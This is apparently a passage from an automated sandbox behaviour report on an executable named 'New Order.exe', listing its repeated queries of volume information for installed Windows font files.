                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
